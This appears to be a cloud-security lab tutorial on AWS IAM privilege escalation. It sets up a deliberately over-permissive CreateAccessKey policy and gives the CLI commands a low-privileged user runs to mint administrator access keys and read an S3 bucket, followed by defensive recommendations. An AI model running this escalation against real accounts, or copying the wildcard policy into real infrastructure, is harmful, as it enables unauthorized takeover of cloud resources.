AWS: IAM CreateAccessKey Privilege Escalation
While cloud providers are responsible for securing the cloud infrastructure, customers are accountable for securing everything they deploy in the cloud, including proper configurations. In this lab, we will show how a low-privileged IAM user can misuse the iam:CreateAccessKey permission where user is allowed to create access keys for another IAM user who can take on elevated roles, leading to privilege escalation. This setup highlights a common misconfiguration in IAM policies that can pose serious security risks.
Table Of Contents
About iam:CreateAccessKey
Lab Setup and Prerequisite
Part 1: IAM Lab Setup
- Creating High Privileged IAM User
- Creating Low Privileged IAM User
Part 2: Enumeration and Exploitation
- Prerequisite for Pentest
- Configuring AWS CLI With Low Privileged User Credentials
- Enumerating IAM Users with AWS CLI
- IAM CreateAccessKey Exploitation
Analysis
Recommendations
Conclusion
About iam:CreateAccessKey
The iam:CreateAccessKey API action allows you to manage AWS account root user credentials. In AWS, “abusing the iam:CreateAccessKey permission” refers to a privilege escalation technique where a user with limited permissions creates access keys for another IAM user, typically one with higher privileges and then uses those keys to gain unauthorized access.
The API action CreateAccessKey generates a new access key ID and secret for a specified IAM user or whoever is making the request.
Lab Setup and Prerequisites
- An AWS Account
- VM Kali Linux
If you are new to AWS platform, it is recommended to go through the AWS Lab setup here,
Part 1: IAM Lab Setup
Here are the instructions for setting up the environment. We will access the AWS console and configure the AWS Command Line Interface (CLI) along with creation of IAM users and attaching CreateAccessKey policy.
Users:
Igt_admin: High-level access
Igt_raj: Basic access but with risky permissions
Policy name:
Vuln_create_access_key: Lets user create access keys
Creating High Privileged IAM User
Navigate to IAM > Users, then click Create user to set up a new IAM identity.
- Create the user a User name (e.g. lgt_admin) and press Next to set the permission.
- Set permission to configure lgt_admin user’s permissions as Attach policies directly from the Permissions options.
- Select AdministratorAccess under Permission Policies section.
AdministratorAccess – In AWS, the AdministratorAccess policy is a built-in policy that gives full access to all services and resources in the account when attached to a user, group, or role. Thus, making it the “high-privileged” target for the lab.
Creating low Privileged IAM User
- Create another IAM user (e.g. lgt_raj) and press.
- Set permission to configure lgt_admin user’s permissions as Attach policies directly from the Permissions options.
- Now, select the Create Policy.
- Write a custom policy to provide certain action to IAM user Igt_raj.
- iam:CreateAccessKey – Allows creation of a new access key (AKIA/Secret) for a specified IAM user.
- iam:ListUsers – Lists all IAM users in the AWS account.
- iam:ListAttachedUserPolicies – Lists all managed policies attached to a specific IAM user.
- iam:GetUser – Retrieves details about a specified IAM user (or the caller if none specified).
- iam:GetPolicy – Retrieves metadata about a managed IAM policy.
- iam:GetPolicyVersion – Retrieves a specific version document of an IAM managed policy.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"iam:CreateAccessKey",
"iam:ListUsers",
"iam:ListAttachedUserPolicies",
"iam:GetUser",
"iam:GetPolicy",
"iam:GetPolicyVersion"
],
"Resource": "*"
}
]
}
This is how the policy looks like after adding certain actions.
- Provide policy details such as policy name (Vuln_create_access_key) and description as shown in the given screenshot.
- Map the policy “Vuln_create_access_key” for user Igt_raj .
- Lastly, let’s “Create access key” for Igt_raj. Select “Command Line Interface (CLI)” as the use case.
Part 2: IAM Enumeration & Exploitation
Why might the CreateAccesskey be used for another IAM user?
It is sometimes used to let a trusted user generate access keys for another IAM user in cases like
- Emergency access – when the admin is unavailable
- Break-glass situations – for urgent recovery tasks
- Automation – in scripts that manage or rotate keys
Note:
Letting users create access keys for others can lead to privilege escalation, is hard to track, and violates least privilege. It should be use with extreme caution.
“We recommend relying on temporary credentials rather than creating long-term credentials such as access keys. Instead, use roles for temporary access.” AWS IAM Best Practices
Prerequisite for Pentest
- Pentest Machine: Kali Linux
- Test Credentials: Igt_raj user’s Access Key + Secret + Region
- Tools: AWS-Cli (sudo apt install awscli)
Configuring AWS CLI With Low Privileged User Credentials
Configure AWS CLI profile with the Igt_raj credentials.
It prompts to enter AWS Access Key ID, AWS Secret Access Key, default region.
aws configure set profile.Igt_raj.aws_access_key_id <rajUser_AccessKey> aws configure set profile.Igt_raj.aws_secret_access_key <rajUser_SecretKey> aws configure set profile.Igt_raj.region us-east-1
Running the get-caller-identity command returns the profile details like user id and Arn. Pay close attention to the ARN, as it uniquely identifies the resource.
aws sts get-caller-identity --profile Igt_raj
Enumerating IAM Users with AWS CLI
Let’s begin the real game. Run the following command. It lists all IAM users in the AWS account.
aws iam list-users --profile Igt_raj
Next, identify the attached policies. The following command shows that user Igt_raj has the CreateAccessKey policy attached, indicating a possible privilege escalation risk.
aws iam list-attached-user-policies --user-name Igt_raj --profile Igt_raj
Use the following command to fetch policy metadata, including its ARN and default version ID (v2), indicating that the policy was updated and v2 should be analyzed for any analysis or exploitation.
aws iam get-policy --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --profile Igt_raj
Running this command will show all the actions, effects and actual contents of policy.
aws iam get-policy-version --policy-arn arn:aws:iam::513869214449:policy/Vuln_create_access_key --version-id v2 --profile Igt_raj
IAM CreateAccessKey Exploitation
Here, we will try to run the command.
aws s3 ls --profile Igt_raj
The action will be denied as no identity-based policy can do it.
Next, is the real exploitation of the CreateAccessKey policy. It requests the long-term credentials for the Igt_admin user.
aws iam create-access-key --user-name Igt_admin –profile Igt_raj
Now, we will setup our AWS CLI credentials according to the above output.
aws configure
Again, use this command to check if its working and it’s a success this time.
aws s3 ls
List your bucket and here you can see text files in output
aws s3 ls s3://igt-bucket
Download the text file
aws s3 cp s3://igt-bucket/proof.txt file_admin.txt
Display the contents of file
cat file_admin.txt
Analysis
This lab highlights a common security gap, overly permissive IAM policies that lack proper restrictions. Such setups can easily be exploited if not carefully reviewed and monitored. The escalation vector was:
Igt_raj → list-users / get-user → have CreateAccessKey Permission → create-access-key on Admin User → Gets Admin Credentials → Configures CLI → Admin Access Gained
Such misconfigurations can occur due to:
- Overly permissive trust policies without resource restrictions (“Resource”: “*”)
- Improper role separation
- Violates Least Privilege Principle
Recommendations
- Avoid giving users iam:CreateAccessKey on others unless absolutely required.
- Use temporary credentials with sts:AssumeRole
- Monitor key creation using AWS CloudTrail and set alerts.
- Use Service Control Policies (SCPs)
- Avoid wildcard permissions: Never use Resource: “*” in sensitive IAM policies
Conclusion
This lab successfully demonstrates a privilege escalation scenario in AWS using the iam:CreateAccessKey and an overly permissive trust policy. It emphasizes the need for cautious and strict permission policies implementation in cloud environments.
Explore more hands-on cloud security labs and techniques in our Cloud Security Archive.
Author: Fatima Aziz is an accomplished cybersecurity professional with expertise in cloud security, holding certifications like GPCS and CCSK. Contact Fatima Aziz on LinkedIn
